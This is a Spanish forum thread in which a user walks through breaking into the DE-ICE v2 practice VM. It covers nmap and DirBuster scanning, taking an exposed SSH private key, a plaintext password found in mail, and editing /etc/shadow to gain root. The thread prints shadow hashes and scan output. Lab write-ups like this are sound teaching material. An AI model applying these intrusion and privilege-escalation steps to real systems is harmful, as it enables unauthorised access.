Título: [Relato] Entorno controlado de seguridad DE-Ice v2 Publicado por: cibergolen en 2 Febrero 2012, 20:49 pm Trasteando aburrido, descargué dos sistemas de seguridad controlados para practicar un Test de Intrusión. Estas son DE-ICE v1 y V2 respectivamente.
Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net. ¿Qué necesitaremos? -Dos máquinas virtuales -De-ICE v2 -Backtrack 5 ¿Cuáles serán nuestros objetivos? -Webcrawling -acceder servidor -Obtener privilegios de ROOT ¿Reglas? -No Exploit Empieza la fiesta. Lo primero que haremos será unir las dos máquinas virtuales. A de-ice se le asigna por defecto la subred 192.168.2.*. Esto se puede realizar con el siguiente comando: Código: ifconfig eth0 192.168.2.150 Procedamos pues a localizar el servidor. haremos uso de Netdiscover, o en su defecto, NMAP -sP 192.168.2.*. Veamos que tenemos por aquí. Citar Currently scanning: 192.168.19.0/16 | Screen View: Unique Hosts Tenemos dos sistemas. Escaneamos con NMAP para obtener resultados.2 Captured ARP Req/Rep packets, fro.m 2 hosts. Total size: 120 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------------------- 192.168.2.100 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS 192.168.2.101 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS Citar nmap -sV 192.168.2.100 - nmap -sV 192.168.2.101 -Primer host:Citar PORT STATE SERVICE VERSION FTP vulnerable... Pero no utilizaremos exploits, ni para atacar, ni para escalar privilegios.20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.4 22/tcp open ssh OpenSSH 4.3 (protocol 1.99) 25/tcp open smtp Sendmail 8.13.7/8.13.7 80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2) 110/tcp open pop3 Openwall popa3d 143/tcp open imap UW imapd 2004.357 443/tcp closed https Vemos que el segundo únicamente tiene el puerto 80. Si accedemos a el via web, no vemos más que unos ficheros. Si accedemos a 192.168.2.100, vemos una página Web. Pincho el enlace y veo direcciones de correo. Está claro: Hay un servicio de correo, por lo que habrán dichos usuarios, "seguramente". Buscando amigos Seleccionamos la lista de correo, y la limpiamos de forma que simplemente quede el nombre del usuario, argegando el signo ~ (user) para tratar de brutalizar, haber si encontramos algún directorio de interés. Ésta es mi lista: Citar root Brutalizamos con DirBuster en 192.168.2.101 y vemos que hay un usuario, pirrip. Tratemos si con un poco de suerte existe la carpeta .ssh.admin ~root ~admin ~pickwick ~winkle ~snodgrass ~tupman ~weller ~tweller ~havisham ~magwitch ~pirrip ~nickleby ~rnickleby ~noggs ~squeers ~pinch ~tapley ~gamp ~marley ~scrooge ~cratchit ~sikes ~dawkins ~claypole http://192.168.2.101/~pirrip/.ssh Ahí tenemos los id_rsa y id_rsa.pub, esperándonos Lo almacenamos en /root/.ssh/ y damos permisos 777. Intruder Here Procedamos a conectar via SSH. Citar ssh pirrip@192.168.2.100 Tachán! estamos dentro.You Have New Mail Entramos y leemos el correo. Hagamos uso de mailx para leer el séptimo correo. En el vemos: Citar root@bt:~# ssh pirrip@192.168.2.100 Leemos el correo:Linux 2.6.16. pirrip@slax:~$ mailx mailx version nail 11.25 7/29/05. Type ? for help. "/var/mail/pirrip": 7 messages 7 new >N 1 Abel Magwitch Sun Jan 13 23:53 20/748 Estella N 2 Estella Havisham Sun Jan 13 23:53 20/780 welcome to the team N 3 Abel Magwitch Sun Jan 13 23:53 20/875 havisham N 4 Estella Havisham Mon Jan 14 00:05 20/861 next month N 5 Abel Magwitch Mon Jan 14 00:05 20/868 vacation N 6 Abel Magwitch Mon Jan 14 00:05 20/915 vacation N 7 noreply@fermion.he Mon Jan 14 00:05 29/983 Fermion Account Login Reminder ? 7 Citar From noreply@fermion.herot.net Mon Jan 14 00:05:15 2008 Tenemos una clave suculenta...Return-Path: <noreply@fermion.herot.net> From: noreply@fermion.herot.net Date: Sun, 13 Jan 2008 23:54:42 +0000 To: pirrip@slax.example.net Subject: Fermion Account Login Reminder User-Agent: nail 11.25 7/29/05 Content-Type: text/plain; charset=us-ascii Status: R Fermion Account Login Reminder Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems. Regards, Fermion Support E-Mail: pirrip@slax.example.net Password: 0l1v3rTw1st Root Me, Please! Hagamos uso de una vieja técnica. Editamos el fichero /etc/shadows, eliminamos el usuario ROOT y sustituimos pirrip por ROOT. De esta forma nos damos privilegios. Citar sudo vi /etc/shadow Ahí ingresaremos la clave que nos facilitó nuestro amigo via mailAntes: Citar root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0::::: Después:bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: smmsp:*:9797:0::::: mysql:*:9797:0::::: rpc:*:9797:0::::: sshd:*:9797:0::::: gdm:*:9797:0::::: pop:*:9797:0::::: nobody:*:9797:0::::: pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7::: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7::: havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7::: Citar bin:*:9797:0::::: Guardamos, y tratamos de entrar como superadministrador. Recordemos la clave: 0l1v3rTw1st.daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: smmsp:*:9797:0::::: mysql:*:9797:0::::: rpc:*:9797:0::::: sshd:*:9797:0::::: gdm:*:9797:0::::: pop:*:9797:0::::: nobody:*:9797:0::::: root:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7::: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7::: havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7::: Citar pirrip@slax:~$ su GAME OVER!Password: *********** root@slax:/home/pirrip# whoami root root@slax:/home/pirrip# Dedicación: 11Sep, [T]rasher, Batista, Exploit-Shell, en fin, a todo OverSec / CPH / H-Sec! Fuente: Oversec.org (Escrito por mi) Un saludo Título: Re: [Relato] Entorno controlado de seguridad DE-Ice v2 Publicado por: cibergolen en 4 Febrero 2012, 10:41 am Cabe aclarar que respondo dudas sobre el tema, pero no via MP.
Saludos Título: Re: [Relato] Entorno controlado de seguridad DE-Ice v2 Publicado por: pianista en 4 Febrero 2012, 18:54 pm Una curiosidad sobretodo porque en intrusiones y tal no estoy muy avezado, pero como modificas haciendo:
sudo vi /etc/shadow Si no eres root y no tienes la contraseña de root? Saludos Título: Re: [Relato] Entorno controlado de seguridad DE-Ice v2 Publicado por: cibergolen en 6 Febrero 2012, 14:57 pm Una curiosidad sobretodo porque en intrusiones y tal no estoy muy avezado, pero como modificas haciendo: sudo vi /etc/shadow Si no eres root y no tienes la contraseña de root? Saludos Pirrip pertenece a wheel Saludos! Título: Re: [Relato] Entorno controlado de seguridad DE-Ice v2 Publicado por: pianista en 6 Febrero 2012, 23:28 pm Ahhhh ok, cierto.
Saludos |